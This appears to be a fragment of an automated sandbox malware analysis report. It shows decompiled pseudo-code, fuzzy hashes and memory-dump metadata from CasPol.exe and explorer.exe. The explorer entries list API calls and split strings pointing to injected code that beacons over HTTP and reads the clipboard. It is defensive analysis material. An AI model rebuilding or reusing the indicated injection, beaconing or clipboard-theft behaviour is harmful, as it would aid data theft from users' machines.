                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                                                                                                                • Instruction ID: 44a4b249c13a2ca95a16acc9264b3b75bc1807cfdf12836957e46321f9e3d2e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE0C231280219FBDB325E84CC00F69FB26EB507A0F104031FE489A6D0CA719C91D6C4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0175A185() {
                                                                                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				if( *0x18167e4 >= 0xa) {
                                                                                                                                                                                                                                                                                                					if(_t5 < 0x1816800 || _t5 >= 0x1816900) {
                                                                                                                                                                                                                                                                                                						return L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						goto L1;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                                                                                					return E01740010(0x18167e0, _t5);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 700f52823ab6a4eaabaae5d3819156b44a5ae03e1dd18645143438cadc591d89
                                                                                                                                                                                                                                                                                                • Instruction ID: 3695ee78a56a961679074eea8560f26c8b622b1159b302f5b8f97700220a7632
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 700f52823ab6a4eaabaae5d3819156b44a5ae03e1dd18645143438cadc591d89
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D017625610005BC72E67209958F25B62AF784760F344A2DE7868B9AAFAE089D9D248
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0173AAB0() {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t4;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                                                                                                                                                				if(_t4 != 0) {
                                                                                                                                                                                                                                                                                                					if( *_t4 == 0) {
                                                                                                                                                                                                                                                                                                						goto L1;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                                                                                					return 0x7ffe0030;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                                                                                                                • Instruction ID: 151baf1725fc986ec8f4eb23feeb9ea33e6462b8f259b3a0aaf50da07c0f9fd5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0D0C935352980CFD617CB0CC554B0573A4FB44B80FC50490E540CB722E62CD940CA00
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172DB40() {
                                                                                                                                                                                                                                                                                                				signed int* _t3;
                                                                                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t3 = L01744620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                                                                                                                                                                                                                                				if(_t3 == 0) {
                                                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					 *_t3 =  *_t3 | 0x00000400;
                                                                                                                                                                                                                                                                                                					return _t3;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                                                                                                                • Instruction ID: 1666e1bf8b6251cc3c1fec18ed57d6ea3d0486ec68f208a1dc14c50445425954
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22C08C30280A01ABEB322F20CD01B00BAA0BB10B01F4400A0A301DA0F0DB78DC02E600
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E017AA537(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				return L01748E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                                                                                                                • Instruction ID: 3173438b612f8569e25964049dc34acb5ca0a2b23c12f9e71ee23f8a749b673b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0C01232080248BBCB226E81CC00F06BB2AEBA8B60F008010BA080A5608632E970EA84
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172AD30(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				return L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                                                                                                                • Instruction ID: 61eb30381277c972c461a283e258b520572f5f3afd259cfa46e6bccda325f854
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C08C32080248BBC712AA45CD00F01BB29E7A0B60F000020F6040A6618A32E860D588
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01743A1C(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				return L01744620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a8c3a860d008d24fd7f8874183f3fd79ab3868bd4a263ffdef057059e515716
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7C08C32080248BBC7126E41DC00F01BB29E7A0B60F000020B6040A5608632EC60E589
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01747D50() {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t3;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                                                                                					return  *_t3;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					return _t3;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                                                                                                                • Instruction ID: 297d6dcd97cf2939d3a23e16cc97b2258035159ec9bd4838c7f4b847c85a5583
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81B092353119408FCE1ADF28C080B1573E4BB44A40B8500D0E400CBA21D329E8408900
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d9f16591124cc03a6a8eb0f1e8bba4cba60243057ce826031847a3c19dcd1884
                                                                                                                                                                                                                                                                                                • Instruction ID: a3eb0b467d83d0d3e52ebe34256deb6fe620c6ea23afac7cd35cede65d5d3f4f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9f16591124cc03a6a8eb0f1e8bba4cba60243057ce826031847a3c19dcd1884
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC900265225000061555A599460450B4445BBDA391791C025F1407590CC66188657361
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f001ef47f7b6ad0ece209d1553cbdf9929b80ac08c0851b412f2072e85d28142
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a7ae217d0d0b272b97e3db00cd5db4398ebf08294099ba41a6c9c9c9edc10f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f001ef47f7b6ad0ece209d1553cbdf9929b80ac08c0851b412f2072e85d28142
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A19002A120540407E550659988046074005ABD4342F51C021A2055555ECA698C517175
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f6be2e220e93c7a066f6dac5a19961b9de1cfeb5ea46d6bd751c4695e37c0b66
                                                                                                                                                                                                                                                                                                • Instruction ID: f0ab6b1391648f65ce4af345cd3897e753fd7dbb988d0ef50b7240dfc718b1d2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6be2e220e93c7a066f6dac5a19961b9de1cfeb5ea46d6bd751c4695e37c0b66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC900271A0900016A550719988146468006BBE4781F55C021A0505554CC9948A5573E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e8b9a63c6d7c63643c5dc03583e6db347458fd750d2341f3b60ae3d6121767e
                                                                                                                                                                                                                                                                                                • Instruction ID: 50617817ddee61f3dd27fd3e6ca99cfa06f9c3bc414b0c4cb156006f69259eb9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e8b9a63c6d7c63643c5dc03583e6db347458fd750d2341f3b60ae3d6121767e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 149002E1205140965910A299C404B0A8505ABE4241F51C026E1045560CC5658851B175
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1f5e662de30ce381388d53d82132cbebd3b78c12d66225e619e80a072ef1531f
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f5573c07211ad5a3f35cbe483ec7adb61b7198ecc87ca3f7c92a2528673322b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5e662de30ce381388d53d82132cbebd3b78c12d66225e619e80a072ef1531f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD90026124500806E5507199C4147074006EBD4641F51C021A0015554DC656896576F1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:3.2%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                Signature Coverage:20.2%
                                                                                                                                                                                                                                                                                                Total number of Nodes:104
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:9

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                                                                                                                                                                                                                                                • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                                                                                                                • API String ID: 878647675-2045366144
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e4b626397c29b42fcaaef1665dbb2473643b36691e749923c6078c533ff43e8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3527330218A088BDB69FF28D498BFAB3E5FB94304F54462ED49BD7146EF34A54AC741
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 329 5987e22-5987e35 330 5987e3b-5987e43 329->330 331 5987ec4-5987ec9 329->331 330->331 332 5987e45-5987e4d 330->332 332->331 333 5987e4f-5987e57 332->333 333->331 334 5987e59-5987e61 333->334 334->331 335 5987e63-5987e6b 334->335 335->331 336 5987e6d-5987e75 335->336 336->331 337 5987e77-5987e7d OpenClipboard 336->337 337->331 338 5987e7f-5987e95 337->338 340 5987eb9-5987ec0 338->340 341 5987e97-5987ea3 338->341 340->331 341->340 344 5987ea5-5987eb1 call 5987c02 341->344 344->340
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClipboardOpen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2793039342-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b0e5e616c801f2336d771a64bde91011fd3322707a33e0b2c0e596f2f8920cf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C1112341289098FDB99BBA880CD7B576E5FB99305F6804B9940BCB1E2DB37CD82C711
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,05989E9B), ref: 05989559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                                                                                                                                                                                                • API String ID: 2681117516-1987325725
                                                                                                                                                                                                                                                                                                • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction ID: e7992c25397b62d10d77796848937a10d64a5e0419ad11d0e3b675c8970cee3f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B031B131B14A4C8BCB04FFA8D8886FEB7E1FF98204F40422AD45ED7240EF7896498795
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 215 598b106-598b111 216 598b15b-598b160 215->216 217 598b113-598b142 215->217 220 598b167-598b168 216->220 221 598b162 call 598deb2 216->221 218 598b16e-598b181 closesocket 217->218 219 598b144-598b162 call 598deb2 217->219 219->220 220->218 221->220
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                                                                                                                                • String ID: clos$esoc$ket
                                                                                                                                                                                                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                                                                                                                                                                                                • Opcode ID: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                                                                                                                                                                                                                                                • Instruction ID: c27a505ad9c2b4cfb0183c360690678bbb80b707dcd175d1587871993d6b6a91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A01F2B150CB488FCB40EF28E0887A97BE0FB85300F58466DE99ECB246D73498468B06
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 223 598b112-598b142 224 598b16e-598b181 closesocket 223->224 225 598b144-598b168 call 598deb2 223->225 225->224
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                                                                                                                                • String ID: clos$esoc$ket
                                                                                                                                                                                                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                                                                                                                                                                                                • Opcode ID: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                                                                                                                                                                                                                                                • Instruction ID: 08084db4f617f7de259793ef65bf169dd2d2d0ae527443855fa3401918e30504
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECF06DB050CB088FCB80EF28E0C8769B7E1FB88310F54567DA94ECB244C77494428706
